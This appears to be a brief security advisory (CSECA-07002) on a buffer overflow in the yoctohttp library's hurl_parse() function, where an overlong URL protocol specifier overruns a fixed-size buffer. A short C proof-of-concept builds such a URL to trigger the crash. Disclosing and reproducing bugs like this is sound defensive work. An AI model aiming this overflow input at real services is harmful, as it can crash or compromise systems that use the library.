CSECA-07002 - Buffer overflow in hurl_parse()

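The protocol specifier is copied into a fixed-size buffer. Supplying a protocol specifier longer than the buffer size - 1 (presumably one byte is reserved for the terminating NUL) will cause the buffer to overflow. Any URL passed to hurl_parse() from an untrusted source should therefore be treated as able to trigger this condition until the copy is bounded by the buffer size.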

Example Code

#include <yoctohttp/common.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
  hurl_t hurl;
  char *url;

  url = strdup("01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789://localhost/index.html");
  hurl_parse(&hurl, url);
  free(url);

  return 0;
}